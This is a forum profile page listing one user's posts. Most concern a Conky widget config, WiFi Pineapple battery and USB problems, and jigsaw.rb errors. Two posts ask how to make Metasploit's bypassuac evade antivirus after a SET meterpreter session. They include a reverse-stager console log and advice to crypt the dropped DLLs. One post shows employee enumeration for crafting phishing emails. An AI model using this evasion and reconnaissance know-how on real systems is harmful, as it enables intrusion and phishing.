Jump to content

SystemCrash86

Active Members
  • Posts

    254
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by SystemCrash86

  1. Hey Guys, I have started using Ubuntu 13.04 more and I am having trouble using a program called conky to personalise my screen. I have windows 7 and a program called rainmeter which I used and had no problems. However in Ubuntu and using rainmeters equivalent conky I am having an issue getting the widget to start on boot and am not sure what to do. I have two more widgets on my desktop and they load when my computer does so I am really stuck as to why this one doesn't. In the screenshot the "CPU/RAM/SWAP" and "MY COMPUTER" widget are the ones that load on boot and the lsd chain Red Queen is the one i am having the issues with as it wont load on boot. I am also having an issue trying to move the text "machine" (at the top) to one side so the word can be seen better. The config file that i am working from for the "Red Queen" widget is as follows: #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # # RED QUEEN v.2.0 # by The Helmsman (http://thehelmsman.deviantart.com/) # # Preview: # http://www.frozenmodule.com/fk/ca/Desktop_logged_out.jpg # http://www.frozenmodule.com/fk/ca/Desktop_logged_in2.jpg # # Wallpaper: # http://www.frozenmodule.com/fk/ca/Red_Queen_Wallpaper.jpg # # Conky: # http://www.frozenmodule.com/fk/ca/conky_redqueen.zip # # FOREWORD: # The original idea came out from the Resident Evil movie # When initial wallpaper was created, the next decision was # to enhance the desktop look and feel with some widgets # After a small research of widgets available for Ubuntu # I came up with decision to use Conky and stumble upon # post of Georgi Karavasilev on how to set up Conky on Ubuntu # (http://www.omgubuntu.co.uk/2012/04/smarten-up-your-desktop-with-this-conky-wallpaper-combo) # Then, when I was reading comments to his post, I found a nice desktop # sample of Conky on John Murray's computer which was heavily based on # VinDSL work (http://ubuntuforums.org/showthread.php?t=1771033) # This is how the first version of conkyrc came out # Later, during next attempts to improve look-and-feel of # the whole Red Queen Theme, I tried to enhance it with # hexagonal grid and found a brilliant usage of it by # Carley166 (http://charley166.deviantart.com/art/conky-conf-265502178) # This is how the current version was borned # During my work on using hexagonal grid as a placeholder of # conky monitoring I decided to use best of both conkyrc from # John Murray and Carley166 # # HOW TO INSTALL: # 1. Unpack zip file to your home directory, you'll get new folder called conky_redqueen # 2. Create .fonts directory in your home folder # For example, your hole folder is: /home/redqueen # Run following command to create .fonts folder in it: # mkdir .fonts # 3. Install Conky by running following commands: # apt-get install conky-all # 4. Optional: if you have Ubuntu 12.04, you need to update Conky by running following command # sudo add-apt-repository ppa:vincent-c/conky # sudo apt-get update # More information can be found here: http://ubuntuforums.org/showthread.php?t=1771033 # 5. Copy all fonts from conky_redqueen/.fonts folder to .fonts folder inside your home directory # 6. Reload fonts by running following command inside your .fonts folder: # fc-cache -fv # 7. Setup wallpaper from conky_redqueen/wallpaper as a desktop background of your Ubuntu # 8. Run conky by executing following command inside your home directory: # conky -c conky_redqueen/conkyrc # # HOW TO STOP: # 1. Locate conky process by running following command: # ps -A | grep conky # You should get something like: # 8987 pts/0 00:02:27 conky # 2. Stop process by executing following command: # kill 8987 # #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # # ¡ BluePrint ! # #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Tested on following platforms: # # Ubuntu 12.04 'Precise Pangoline' # Screen Resolution: # 1920x1080x24 (wallpaper) # 1600x1200x24 (virtual machine - WMware player) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Prerequisites (required) # # conky-all 1.8.0 or 1.8.1 # UTF-8 Compatible Text Editor (SublimeText2 preferable) #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Installed fonts (required) # # ConkyWeather (Stanko Metodiev - included in Conky distro) # ConkyWindNESW (Stanko Metodiev - included in Conky distro) # Cut Outs for 3D FX (Fonts & Things) # Droid Font Family (Google Android SDK) # KR A Round (Kat's Fun Fonts) # Moon Phases (Curtis Clark) # OpenLogos (Icoma) # PizzaDude Bullets (Jakob Fischer) # Radio Space (Iconian Fonts) # StyleBats (Vinterstille) # Ubuntu Font Family (Canonical Ltd) # Ubuntu Title Bold (Paulo Silva - not included in link below) # Weather (Jonathan Macagba) # Zekton (Ray Larabie) # ## Tips n' Tricks from Mr. Peachy, djyoung4, and 42dorian (Thanks!) ## Most necessary fonts can be downloaded here: http://ompldr.org/vOHdoag ## Unzip the fonts into your font folder, for example: /home/username/.fonts ## Run this command in a terminal (rebuilds font cache file): sudo fc-cache -fv #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Use XFT? Required to Force UTF8 (see below) # use_xft yes xftfont Zekton:size=9 xftalpha 0.1 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Force UTF8? Requires XFT (see above) ## Displays degree symbol, instead of °, etc. # override_utf8_locale yes #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## This buffer is used for text, single lines, output from $exec, and other variables. ## Increasing the text buffer size (too high) will drastically reduce Conky's performance. ## Decreasing the size (too low) will truncate content and cause strange display output. ## Standard text buffer size is 256 bytes (cannot be less). Adjust YOUR buffer wisely! # text_buffer_size 2048 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Daemonize Conky, aka 'fork to background'. # background yes #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Update interval in seconds. # update_interval 1.5 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## The number of times Conky will update before quitting. ## Zero makes Conky run forever. # total_run_times 0 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Create own window instead of using desktop? # own_window yes own_window_type normal own_window_class Conky own_window_transparent yes own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Force images to redraw when they change. # imlib_cache_size 0 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Use double buffering? Reduces flicker. # double_buffer yes #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Draw shades? # draw_shades no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Draw outlines? # draw_outline no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Draw borders around text? # draw_borders no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Draw borders around graphs? # draw_graph_borders no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Print text to stdout? ## Print text in console? # out_to_ncurses no out_to_console no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Text alignment. # alignment top_left #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Minimum size of the text area. ## Syntax: minimum_size [width] [height] # minimum_size 280 0 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Maximum width of the text area. ## Syntax: maximum_width [width] # #maximum_width 240 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Gap between text and screen borders. # gap_x 1050 gap_y 1300 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Shorten MiB/GiB to M/G in stats. # short_units yes #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Pad % symbol spacing after numbers. # pad_percents 0 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Pad spacing between text and borders. # border_inner_margin 4 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Limit the length of names in "Top Processes". # top_name_width 10 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Subtract file system -/+buffers/cache from used memory? ## Set to yes, to produce meaningful physical memory stats. # no_buffers yes #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Set to yes, if you want all text to be in UPPERCASE. # uppercase no #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Number of cpu samples to average. ## Set to 1 to disable averaging. # cpu_avg_samples 1 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Number of net samples to average. ## Set to 1 to disable averaging. # net_avg_samples 1 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ## Add spaces to keep things from moving around? ## Only affects certain objects. # use_spacer right #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # BAR SIZE #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- default_bar_size 30 8 #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # COLORS #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- default_color EDE7F7 default_shade_color 000000 color0 FF4663 color1 EDE7F7 color2 E2163D own_window_argb_visual yes own_window_colour 000000 own_window_argb_value 0 TEXT #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # LOGO #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${goto 185}${color0}${font Zekton:style=bold:size=12}${alignr}Red Queen ${goto 125}${voffset 2}${color}${font Zekton:style=bold:size=8}${alignr}${sysname}${offset 5}${pre_exec lsb_release -sd || cat /etc/*release} ${goto 147}Machine${offset 5}${voffset 0}${machine}${alignr}-${freq_g cpu0}GHz${font} #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # TEMPERATURE #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${goto 185}${voffset -25}${font DroidSans:bold:size=8}${color}${goto 60}TEMPERATURE: ${goto 85}${color1}${font Zekton:style=Bold:size=9}${color2}${acpitemp}°C${color}${font}#{execi 30 sensors | grep 'Core0' | cut -c15-16}°C${color}${font} #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # TIME #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${voffset -7}${font DroidSans:bold:size=8}${color EDE7F7}TIME${offset 8}${color 6A6986}${voffset 20}${font} ${voffset -4}${font RadioSpace:size=30}${color EDE7F7}${if_match ${time %l}<=9}${time %H:%M:%S}${else}${if_match ${time %H}>=10}${time %H:%M:%S}${endif}${endif}${font} #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # CPU #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${voffset -10}${goto 167}${voffset 6}${font StyleBats:size=9.9}k${voffset -5}${font Zekton:style=Bold:size=9}${offset 2}CPU ${goto 172}${font Zekton:style=Bold:size=9}${color2}${cpu cpu1}% #${font}${color} ${alignr 24}Temperature: ${color1}${font Zekton:style=Bold:size=9}${color1}${acpitemp}°C${color}${font}#{execi 30 sensors | grep 'Core0' | cut -c15-16}°C #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # HDD & UPTIME #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${color1}${goto 40}${voffset 5}${font StyleBats:size=9.9}x${voffset -5}${font Zekton:style=Bold:size=9}${offset 2}HDD: ${goto 45}${font Zekton:style=Bold:size=9}${color2}${fs_used /home} ${voffset -35}${goto 110}${font StyleBats:size=10}${color1}q${voffset -5}${font Zekton:style=Bold:size=9}${offset 2}UpTime: ${goto 120}${voffset 0}${color2}${uptime_short} #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # RAM #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${voffset 10}${goto 80}${font StyleBats:size=10}${color1}l${voffset -5}${offset 2}${font Zekton:style=Bold:size=9}RAM${color2} ${goto 90}${font Zekton:style=Bold:size=9}${memperc}% #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # BACKGROUND IMAGE #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ${image ./lsd.png -p 10,0} I got the theme from deviantart.com and tweeked it to suit my needs but there are still bits that i am havings issues with but the most important one is getting it to load on boot. Hope someone can help
  2. Oh no i fully understand that, i know exactly how to crypt applications as i've done that before. What i mean was where are the files he was referring to that i need to crypt in order for meterpreters bypassuac script to bypass antivirus or did he want me to actually crypt the bypassuac script itself? I get a meterpreter session but when using bypassuac to escalate my privilages the bypassuac script keeps getting detected by my antivirus
  3. I was using SET and I can get a meterpreter session easy on my Desktop running windows 7 with up-to-date Microsoft Security Essentials thanks to the new and improved multi powershell attack on multiple port. When I go to the cloned webpage I get the java applet like normal and I am not notified by my antivirus that there is a problem. Great. If I understand correctly it goes straight into memory never touching disk right? Now once I have a meterpreter session the next thing I try to do is escalate my privileges and running “get system” does not work so I use the script that Dave Kennedy and Kevin Mitnick made to bypass uac, but whenever I do it is automatically caught by my antivirus. How is it possible to get this to work? I already have a meterpreter session. I try to search on Google for an answer and all I get is videos of bypassuac tutorials - all of which work flawlessly so I cant explain why my antivirus catches it when I can get a meterpreter session. When getting a meterpreter and running bypassuac this is what I get as my desktop pc Microsoft security essentials detects it: msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter > run bypassuac [*] Creating a reverse meterpreter stager: LHOST=192.168.1.71 LPORT=4546 [*] Running payload handler [*] Uploading Windows UACBypass to victim machine. [*] Bypassing UAC Restrictions on the system.... [*] Meterpreter stager executable 73802 bytes long [*] Uploaded the agent to the filesystem.... [*] Executing the agent with endpoint 192.168.1.71:4546 with UACBypass in effect... [*] C:\Users\CHRIST~1\AppData\Local\Temp\wHOFsw.exe /c %TEMP%\FJElQacDvdzS.exe meterpreter > use post/windows/escalate/bypassuac Loading extension post/windows/escalate/bypassuac... [-] Failed to load extension: No such file or directory -/opt/metasploit/msf3/data/meterpreter/ext_server_post/windows/escalate/bypassuac.dll meterpreter > I emailed Dave Kennedy and this is what he told me I have to do: “You need to obfuscate the executables that it drops. They are in the Metasploit repositories and are dll's. Just need to randomize / pack / crypt them to get around AV..” However I am not sure what files he means, I have tried looking but so far I have been unable to locate them. Dave says I should be looking for dll’s in the metasploit repositories but I looked but cant find them or even sure if they are the right ones. I am using Backtrack 5r3. (Not yet made the switch to Kali yet) I am very confused and I am hoping that you guys could take the time to help me. All help is greatly appreciated. Since Dave is a very busy man working extremely hard I wouldn’t want to waste his time that’s why I am posting this on the forums to see if anyone can help.
  4. I got the anker 3 that you were talking about and it seems that - at least for now - that its working. I was just wondering if anyone has any ideas what i can now use for the case that i can put them in because the anker 3 is bigger than the pineapple juice and no longer fits in the case i had with the pineapple?
  5. How do you do that, what kind of battery do you have as i don't see a way to do that?
  6. Could the USB power cable that is shipped with the pineapple be faulty because that is what i am using from the battery to the pineapple?
  7. I just plugged the Anker back into my pineapple after its fully charged (blue leds go out when fully charged) and at first the usb didn't even show up, even the led was not lit. So i tool it out and put it in my computer - it loaded fine so i put it back into the pineapple which then the usb led on the pineapple started flashing and the orange light on the usb is on. Under the usb tab it shows: lsusb Output Bus 001 Device 006: ID 0781:5530 SanDisk Corp. Cruzer Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Part of the system log file (located under the logs tab) shows: 00:01:32 Pineapple user.notice usb-modeswitch: 1-0:1.0: Manufacturer=Linux_3.7.6_ehci_hcd Product=Generic_Platform_EHCI_Controller Serial=ehci-platform 00:01:32 Pineapple kern.err kernel: [ 92.580000] hub 1-0:1.0: unable to enumerate USB device on port 1 00:01:32 Pineapple kern.err kernel: [ 92.460000] usb 1-1: device descriptor read/8, error -71 00:01:28 Pineapple kern.err kernel: [ 88.830000] usb 1-1: device descriptor read/8, error -145 00:01:23 Pineapple kern.info kernel: [ 83.800000] usb 1-1: new high-speed USB device number 5 using ehci-platform 00:01:23 Pineapple kern.err kernel: [ 83.570000] usb 1-1: device descriptor read/8, error -145 00:01:18 Pineapple kern.err kernel: [ 78.440000] usb 1-1: device descriptor read/8, error -145 00:01:13 Pineapple kern.info kernel: [ 73.410000] usb 1-1: new high-speed USB device number 4 using ehci-platform 00:01:13 Pineapple kern.err kernel: [ 73.180000] usb 1-1: device descriptor read/64, error -145 00:01:05 Pineapple user.info sysinit: setting up led WLAN 00:01:05 Pineapple user.info sysinit: setting up led WAN 00:01:05 Pineapple user.info sysinit: setting up led USB 00:01:05 Pineapple user.info sysinit: setting up led LAN 00:01:05 Pineapple user.info sysinit: Selected interface 'wlan0' 00:01:05 Pineapple user.info sysinit: OK 00:01:05 Pineapple user.info sysinit: /etc/rc.local: line 7: /usb/infusions/logcheck/logcheck.sh: not found 00:01:04 Pineapple kern.info kernel: [ 64.220000] br-lan: port 2(wlan0) entered forwarding state 00:01:02 Pineapple kern.info kernel: [ 62.220000] br-lan: port 2(wlan0) entered forwarding state 00:01:02 Pineapple kern.info kernel: [ 62.220000] br-lan: port 2(wlan0) entered forwarding state 00:01:02 Pineapple kern.info kernel: [ 62.140000] device wlan0 entered promiscuous mode
  8. No problem, just tell me what you need and i'll post it
  9. Just tried it on mains power, i created a new folder then scp'd that to the usb part and typed reboot from the advanced menu. Once rebooted i ssh'd in went to the usb directory and the new folder was still there. The Anker Astro3E which has been charged from my computer has all the lights a steady blue
  10. Question - am i doing this when the pineapple is on mains power or battery? On battery it doesn't even mount and on mains power i can ssh into the pineapple and issue cd /usb/ it works
  11. This is my fstab config global automount option from_fstab 1 option anon_mount 1 config global autoswap option from_fstab 1 option anon_swap 0 config mount option target /usb option device /dev/sda1 option fstype ext4 option options rw,sync option enabled 1 option enabled_fsck 0 config swap option device /dev/sda2 option enabled 1 I followed the instructions in the booklet that comes with the pineapple and the format i did was clean its tell me no errors then i enabled the swap partition by issuing "mkswap /dev/sda2". All of this is no problem when powering the pineapple on the mains but when i plug in the battery the usb fails to load
  12. It was in my Backtrack machine (ubuntu), i tried it on windows but becasue its been formatted ext4 it wont load becasue windows cant read ext4
  13. I formatted it before without any problems and i can moved files to and from the device. However when i click on the usbs properties and click permissons all i get is: "The Permissions of USB Partition 1 could not be determined" hmmm not sure, does this mean that its still gone into write protect mode? The usb loads up fine when the pineapple is connected to the mains power but as soon as its on battery power the usb will not load despite me purchasing a new Anker Astro3 battery
  14. I bought the Anker Astro3 and it made no change. It powers everything else including the pineapple but will NOT load my Sandisk Cruzer Fit thats plugged into it even though the led lights are on. This is really annoying me now. I don't know what's wrong
  15. That explains why i can no longer load www.jigsaw.com in my browser. Does this mean that jigsaw.rb in backtrack is now useless?
  16. Well i have the latest edition of Backtrack 5r3 and when i run ruby -v in the terminal i get: root@bt:~/Downloads# ruby -v ruby 1.9.2dev (2010-07-020 [i486-linux]
  17. I tried that, i signed up at www.jigsaw.com and created a free account then tried again: root@bt:/pentest/enumeration/jigsaw# ruby jigsaw.rb -s google -u myemail@something.com -p ******************** Error getting cookie. Connection timed out - connect(2) Searching for google. Error performing search. undefined method `keys' for #<Errno::ETIMEDOUT: Connection timed out - connect(2)> root@bt:/pentest/enumeration/jigsaw# And i am running the lastest version
  18. I am using Backtrack 5r3 and have been playing around with SET (Social Engineering Toolkit) and Metasploit's Harverster with success with my Window XP virtual machine. I thought i would try jigsaw in the Backtrack menu - Backtrack - Information Gathering - Network Analysis - OSINT Analysis -Jigsaw I have run into some errors that i can't explain. I use example Google just to get me started, and its what is used on tutorials on youtube. First when i ran jigsaw it started out good : root@bt:/pentest/enumeration/jigsaw# ./jigsaw.rb -s google Searching for google. Jigsaw ID: 215043 - Google, Inc. (5,896 employee/s) Jigsaw ID: 224667 - Google Postini Services (159 employee/s) Jigsaw ID: 439035 - AdMob Google Inc (3 employee/s) Jigsaw ID: 3661145 - Maps and Google Maps (1 employee/s) Jigsaw ID: 5170157 - Get Found on Google (0 employee/s) Jigsaw ID: 5124294 - Google Web List (0 employee/s) Jigsaw ID: 5138337 - Indian Art Company (0 employee/s) Jigsaw ID: 5184654 - Master Google (0 employee/s) Jigsaw ID: 5185023 - Davis Oldfield Inc (0 employee/s) Jigsaw ID: 5068941 - Appliance Service and Repair Center (0 employee/s) Jigsaw ID: 4866147 - Google Ventures (0 employee/s) Jigsaw ID: 458155 - Oogles N Googles (0 employee/s) Jigsaw ID: 1794426 - California Power and Light (0 employee/s) Jigsaw ID: 2378402 - How To Use Google (0 employee/s) root@bt:/pentest/enumeration/jigsaw# ./jigsaw.rb -i root@bt:/pentest/enumeration/jigsaw# ^C root@bt:/pentest/enumeration/jigsaw# ./jigsaw.rb -i 224667 Your target has 3 domain/s: [1] - neomeo.com [2] - postini.com [3] - postinicorp.com Enter the number of the domain to use for crafting emails: 2 Using 'postini.com' to craft emails. Found 27 records in the Sales department. Found 15 records in the Marketing department. Found 17 records in the Finance & Administration department. Found 4 records in the Human Resources department. Error retrieving number of records Timeout::Error Error retrieving number of records Connection timed out - connect(2) Error retrieving number of records Connection timed out - connect(2) Then when i tried to run it a second time all i got was: root@bt:/pentest/enumeration/jigsaw# ./jigsaw.rb -s google Error getting cookie. Connection timed out - connect(2) Searching for google. Error performing search. undefined method `keys' for #<Errno::ETIMEDOUT: Connection timed out - connect(2)> root@bt:/pentest/enumeration/jigsaw# I have uninstalled, reinstalled, restarted, even downgraded once but still nothing. Hope someone can help
  19. What about this one it has a 3A output http://www.amazon.co.uk/gp/product/B0063AAIRG/ref=noref?ie=UTF8&psc=1&s=computers 10000mAh
  20. would this work http://www.amazon.co.uk/gp/product/B0073F92OK/ref=oh_details_o00_s00_i00
  21. Which one works best or do they all work with the pineapple?
  22. Yeah i have seen this problem multiple times in here, whats the ankler? I've never come accross that yet
  23. I have a problem with my pineapple juice battery pack model i3200. It charges ok and manages to power objects like my phone etc and even the pineapple itself, however it wont power the usb that is in the pineapple so i can use the modules installed on it. On the pineapple the usb light is lit and the usb (a 4GB Sandisk - just like they sell in the hakshop) and the little orange light on the usb to show its loading can be seen so iknow its powered but when i get to the pineapple GUI i cannot access and modules on battery power Any suggestions?
×
×
  • Create New...